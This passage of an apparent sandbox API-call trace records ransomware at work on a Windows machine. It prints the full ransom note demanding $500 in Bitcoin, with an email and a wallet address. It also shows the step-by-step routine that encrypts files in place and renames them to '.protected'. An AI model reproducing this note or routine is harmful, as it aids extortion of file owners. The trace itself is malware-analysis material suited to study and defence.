(normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\internet explorer\\quick launch"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0090.001] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 1 [0090.001] lstrcmpiW (lpString1="ImplicitAppShortcuts", lpString2="Windows") returned -1 [0090.001] lstrcmpiW (lpString1="ImplicitAppShortcuts", lpString2="Program Files") returned -1 [0090.001] lstrcmpiW (lpString1="ImplicitAppShortcuts", lpString2="Program Files (x86)") returned -1 [0090.001] lstrcmpiW (lpString1="ImplicitAppShortcuts", lpString2="$Recycle.bin") returned 1 [0090.001] lstrcmpiW (lpString1="ImplicitAppShortcuts", lpString2="System Volume Information") returned -1 [0090.001] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\ImplicitAppShortcuts") returned 123 [0090.001] lstrcmpW (lpString1="ImplicitAppShortcuts", lpString2=".") returned 1 [0090.001] lstrcmpW (lpString1="ImplicitAppShortcuts", lpString2="..") returned 1 [0090.002] wnsprintfW (in: pszDest=0x503c40, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\ImplicitAppShortcuts\\*") returned 125 [0090.002] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\ImplicitAppShortcuts\\*", lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 0x47bb10 [0090.002] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0090.002] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0090.002] lstrcmpiW (lpString1=".", lpString2="Program Files 
(x86)") returned -1 [0090.002] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0090.002] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0090.002] wnsprintfW (in: pszDest=0x503c40, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\ImplicitAppShortcuts\\.") returned 125 [0090.002] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0090.002] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 1 [0090.002] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0090.002] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0090.002] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0090.003] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0090.003] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0090.003] wnsprintfW (in: pszDest=0x503c40, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\ImplicitAppShortcuts\\..") returned 126 [0090.003] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0090.003] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0090.003] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 0 [0090.003] FindClose (in: hFindFile=0x47bb10 | out: hFindFile=0x47bb10) returned 1 [0090.003] wnsprintfW (in: pszDest=0x503c40, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\ImplicitAppShortcuts\\RESTORE_FILES.txt") returned 141 [0090.003] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User 
Pinned\\ImplicitAppShortcuts\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\user pinned\\implicitappshortcuts\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0090.004] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0090.004] WriteFile (in: hFile=0x154, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, 
lpNumberOfBytesWritten=0x295e2d4*=0x53d, lpOverlapped=0x0) returned 1 [0090.005] lstrlenA (lpString="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") returned 684 [0090.005] WriteFile (in: hFile=0x154, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295e2d4*=0x2ac, lpOverlapped=0x0) returned 1 [0090.005] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0090.005] WriteFile (in: hFile=0x154, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295e2d4*=0xb1, lpOverlapped=0x0) returned 1 [0090.005] CloseHandle (hObject=0x154) returned 1 [0090.005] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 1 [0090.005] lstrcmpiW (lpString1="TaskBar", lpString2="Windows") returned -1 [0090.005] lstrcmpiW (lpString1="TaskBar", lpString2="Program Files") returned 1 [0090.005] lstrcmpiW (lpString1="TaskBar", lpString2="Program Files (x86)") returned 1 [0090.005] lstrcmpiW (lpString1="TaskBar", lpString2="$Recycle.bin") returned 1 [0090.005] lstrcmpiW (lpString1="TaskBar", lpString2="System Volume Information") returned 1 [0090.005] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar") returned 110 [0090.005] lstrcmpW (lpString1="TaskBar", lpString2=".") returned 1 [0090.005] lstrcmpW (lpString1="TaskBar", lpString2="..") returned 1 [0090.005] wnsprintfW (in: pszDest=0x503c40, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet 
Explorer\\Quick Launch\\User Pinned\\TaskBar\\*") returned 112 [0090.005] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\*", lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 0x47bb10 [0090.005] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0090.005] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0090.006] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0090.006] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0090.006] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0090.006] wnsprintfW (in: pszDest=0x503c40, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\.") returned 112 [0090.006] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0090.006] StrStrIW (lpFirst=".", lpSrch=".protected") returned 0x0 [0090.006] lstrcmpW (lpString1=".", lpString2="RESTORE_FILES.txt") returned -1 [0090.006] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e28c | out: pbBuffer=0x295e28c) returned 1 [0090.006] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x30) returned 1 [0090.006] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\." 
(normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\user pinned\\taskbar\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0090.006] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 1 [0090.006] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0090.006] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0090.006] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0090.006] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0090.006] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0090.006] wnsprintfW (in: pszDest=0x503c40, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\..") returned 113 [0090.006] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0090.006] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0090.006] StrStrIW (lpFirst="..", lpSrch=".protected") returned 0x0 [0090.006] lstrcmpW (lpString1="..", lpString2="RESTORE_FILES.txt") returned -1 [0090.006] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e28c | out: pbBuffer=0x295e28c) returned 1 [0090.006] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x30) returned 1 [0090.006] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\.." 
(normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\user pinned"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0090.006] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 1 [0090.006] lstrcmpiW (lpString1="desktop.ini", lpString2="Windows") returned -1 [0090.006] lstrcmpiW (lpString1="desktop.ini", lpString2="Program Files") returned -1 [0090.007] lstrcmpiW (lpString1="desktop.ini", lpString2="Program Files (x86)") returned -1 [0090.007] lstrcmpiW (lpString1="desktop.ini", lpString2="$Recycle.bin") returned 1 [0090.007] lstrcmpiW (lpString1="desktop.ini", lpString2="System Volume Information") returned -1 [0090.007] wnsprintfW (in: pszDest=0x503c40, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\desktop.ini") returned 122 [0090.007] StrStrIW (lpFirst="desktop.ini", lpSrch=".protected") returned 0x0 [0090.007] lstrcmpW (lpString1="desktop.ini", lpString2="RESTORE_FILES.txt") returned -1 [0090.007] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e28c | out: pbBuffer=0x295e28c) returned 1 [0090.007] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x30) returned 1 [0090.007] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\user pinned\\taskbar\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, 
dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0090.007] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\desktop.ini") returned 122 [0090.007] StrStrW (lpFirst="desktop.ini", lpSrch=".txt") returned 0x0 [0090.007] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\desktop.ini") returned 122 [0090.007] StrStrW (lpFirst="desktop.ini", lpSrch=".rar") returned 0x0 [0090.008] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\desktop.ini") returned 122 [0090.008] StrStrW (lpFirst="desktop.ini", lpSrch=".zip") returned 0x0 [0090.008] ReadFile (in: hFile=0x158, lpBuffer=0x513c88, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x513c88*, lpNumberOfBytesRead=0x295e2d4*=0x19c, lpOverlapped=0x0) returned 1 [0090.008] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xfffffe64, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0090.008] WriteFile (in: hFile=0x158, lpBuffer=0x513c88*, nNumberOfBytesToWrite=0x19c, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x513c88*, lpNumberOfBytesWritten=0x295e2d4*=0x19c, lpOverlapped=0x0) returned 1 [0090.009] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0090.009] WriteFile (in: hFile=0x158, lpBuffer=0x295e2ac*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x295e2ac*, lpNumberOfBytesWritten=0x295e2d4*=0x4, lpOverlapped=0x0) returned 1 [0090.009] WriteFile (in: hFile=0x158, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, 
lpNumberOfBytesWritten=0x295e2d4*=0x30, lpOverlapped=0x0) returned 1 [0090.009] CloseHandle (hObject=0x158) returned 1 [0090.009] wnsprintfW (in: pszDest=0x513c88, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\desktop.ini.protected") returned 132 [0090.009] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\user pinned\\taskbar\\desktop.ini"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\desktop.ini.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\user pinned\\taskbar\\desktop.ini.protected")) returned 1 [0090.010] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 1 [0090.011] lstrcmpiW (lpString1="Google Chrome.lnk", lpString2="Windows") returned -1 [0090.011] lstrcmpiW (lpString1="Google Chrome.lnk", lpString2="Program Files") returned -1 [0090.011] lstrcmpiW (lpString1="Google Chrome.lnk", lpString2="Program Files (x86)") returned -1 [0090.011] lstrcmpiW (lpString1="Google Chrome.lnk", lpString2="$Recycle.bin") returned 1 [0090.011] lstrcmpiW (lpString1="Google Chrome.lnk", lpString2="System Volume Information") returned -1 [0090.011] wnsprintfW (in: pszDest=0x503c40, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Google Chrome.lnk") returned 128 [0090.011] StrStrIW (lpFirst="Google Chrome.lnk", lpSrch=".protected") returned 0x0 [0090.011] lstrcmpW (lpString1="Google Chrome.lnk", 
lpString2="RESTORE_FILES.txt") returned -1 [0090.011] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e28c | out: pbBuffer=0x295e28c) returned 1 [0090.011] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x30) returned 1 [0090.011] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Google Chrome.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\user pinned\\taskbar\\google chrome.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0090.011] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Google Chrome.lnk") returned 128 [0090.012] StrStrW (lpFirst="Google Chrome.lnk", lpSrch=".txt") returned 0x0 [0090.012] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Google Chrome.lnk") returned 128 [0090.012] StrStrW (lpFirst="Google Chrome.lnk", lpSrch=".rar") returned 0x0 [0090.012] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Google Chrome.lnk") returned 128 [0090.012] StrStrW (lpFirst="Google Chrome.lnk", lpSrch=".zip") returned 0x0 [0090.012] ReadFile (in: hFile=0x158, lpBuffer=0x513c88, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x513c88*, lpNumberOfBytesRead=0x295e2d4*=0x8dd, lpOverlapped=0x0) returned 1 [0090.012] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xfffff723, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | 
out: lpNewFilePointer=0xffffffff) returned 1 [0090.012] WriteFile (in: hFile=0x158, lpBuffer=0x513c88*, nNumberOfBytesToWrite=0x8dd, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x513c88*, lpNumberOfBytesWritten=0x295e2d4*=0x8dd, lpOverlapped=0x0) returned 1 [0090.013] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0090.013] WriteFile (in: hFile=0x158, lpBuffer=0x295e2ac*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x295e2ac*, lpNumberOfBytesWritten=0x295e2d4*=0x4, lpOverlapped=0x0) returned 1 [0090.013] WriteFile (in: hFile=0x158, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e2d4*=0x30, lpOverlapped=0x0) returned 1 [0090.013] CloseHandle (hObject=0x158) returned 1 [0090.013] wnsprintfW (in: pszDest=0x513c88, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Google Chrome.lnk.protected") returned 138 [0090.013] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Google Chrome.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\user pinned\\taskbar\\google chrome.lnk"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Google Chrome.lnk.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\user pinned\\taskbar\\google chrome.lnk.protected")) returned 1 [0090.015] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 1 
[0090.015] lstrcmpiW (lpString1="Internet Explorer (2).lnk", lpString2="Windows") returned -1 [0090.015] lstrcmpiW (lpString1="Internet Explorer (2).lnk", lpString2="Program Files") returned -1 [0090.015] lstrcmpiW (lpString1="Internet Explorer (2).lnk", lpString2="Program Files (x86)") returned -1 [0090.015] lstrcmpiW (lpString1="Internet Explorer (2).lnk", lpString2="$Recycle.bin") returned 1 [0090.015] lstrcmpiW (lpString1="Internet Explorer (2).lnk", lpString2="System Volume Information") returned -1 [0090.015] wnsprintfW (in: pszDest=0x503c40, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Internet Explorer (2).lnk") returned 136 [0090.015] StrStrIW (lpFirst="Internet Explorer (2).lnk", lpSrch=".protected") returned 0x0 [0090.015] lstrcmpW (lpString1="Internet Explorer (2).lnk", lpString2="RESTORE_FILES.txt") returned -1 [0090.015] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e28c | out: pbBuffer=0x295e28c) returned 1 [0090.015] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x30) returned 1 [0090.015] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Internet Explorer (2).lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\user pinned\\taskbar\\internet explorer (2).lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0090.016] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Internet Explorer (2).lnk") returned 136 [0090.016] StrStrW 
(lpFirst="Internet Explorer (2).lnk", lpSrch=".txt") returned 0x0 [0090.016] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Internet Explorer (2).lnk") returned 136 [0090.016] StrStrW (lpFirst="Internet Explorer (2).lnk", lpSrch=".rar") returned 0x0 [0090.016] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Internet Explorer (2).lnk") returned 136 [0090.016] StrStrW (lpFirst="Internet Explorer (2).lnk", lpSrch=".zip") returned 0x0 [0090.016] ReadFile (in: hFile=0x158, lpBuffer=0x513c88, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x513c88*, lpNumberOfBytesRead=0x295e2d4*=0x5ad, lpOverlapped=0x0) returned 1 [0090.016] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xfffffa53, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0090.016] WriteFile (in: hFile=0x158, lpBuffer=0x513c88*, nNumberOfBytesToWrite=0x5ad, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x513c88*, lpNumberOfBytesWritten=0x295e2d4*=0x5ad, lpOverlapped=0x0) returned 1 [0090.017] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0090.017] WriteFile (in: hFile=0x158, lpBuffer=0x295e2ac*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x295e2ac*, lpNumberOfBytesWritten=0x295e2d4*=0x4, lpOverlapped=0x0) returned 1 [0090.017] WriteFile (in: hFile=0x158, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e2d4*=0x30, lpOverlapped=0x0) returned 1 [0090.017] CloseHandle (hObject=0x158) returned 1 [0090.017] wnsprintfW (in: pszDest=0x513c88, cchDest=32767, pszFmt="%s%s" 
